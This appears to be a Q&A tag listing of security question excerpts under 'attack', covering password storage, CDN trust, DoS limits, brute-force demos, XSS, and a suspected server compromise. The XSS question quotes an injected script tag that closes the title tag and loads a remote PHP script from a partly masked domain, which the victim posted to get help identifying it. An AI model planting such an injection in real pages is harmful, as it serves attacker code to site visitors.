attack

database security

I've been reading about database security when it comes to websites. And it says an attacker could steal a database and then have as much time as he wants to get all the users' passwords. If an attacker stole the database, why would he need the passwords, as the authentication is done in PHP? So he could just access all the user's informa...

How secure are CDNs for delivering jQuery?

We build sites that have a public (non-secured) area and a secured (delivered over HTTPS) area, and we use the jQuery library. Recently I suggested we use Google CDN for jQuery delivery. Some of my colleagues expressed concerns with regard to the security aspect of this way of delivering JavaScript libraries. For example, they mention the scenario ...

Java input stream limit: protecting against DoS attacks

I'm coding a tool that, given any URL, would periodically fetch its output. The problem is that the output could be not a simple and lightweight HTML page (expected in most cases), but some heavy data stream (i.e. straight from /dev/urandom, possible DoS attack). I'm using java.net.URL + java.net.URLConnection, setting connection and re...

Generating every character combination up to a certain word length

I am doing a security presentation for my Computer and Information Security course in a few weeks' time, and in this presentation I will be demonstrating the pros and cons of different attacks (dictionary, rainbow and bruteforce). I can do the dictionary and rainbow attacks fine, but I need to generate the bruteforce attack on the fly. I ne...

Need help with this XSS attack

Does anybody know more information about this attack? I recently got this script injected in my web sites. By the way, don't go on this web site since it's the source of the infection. </title><script src=http://google-stats50.**fo/***.php> What kind of attack is it, SQL or CODE? By the way, don't go on this web site since it's the ...

What are security issues in ASP.NET MVC?!

What are security issues in ASP.NET MVC?! And does MVC solve XSS and the others?! ...

IIS - Inbound closed before receiving peer's close_notify

We have a Java application which runs inside Apache/Tomcat and connects to a web service hosted on IIS / Windows 2003 R2. The connection is made over SSL. Recently, to enhance security, we have moved the security provider in the JRE from the default Sun libraries to libraries provided by RSA. After that we are not able to connect to webservice an...

Has my Linux server been attacked?

I feel as if my server (ubuntu 10.4) has been attacked. I'm a bit of a Linux noob. I run a website and a few rows of MySQL data have been deleted. This has happened three times now. The auth log is empty prior to 2:00pm ET today. All that shows prior to my logins were a few cronjobs running. The data disappeared between 7pm and 10p...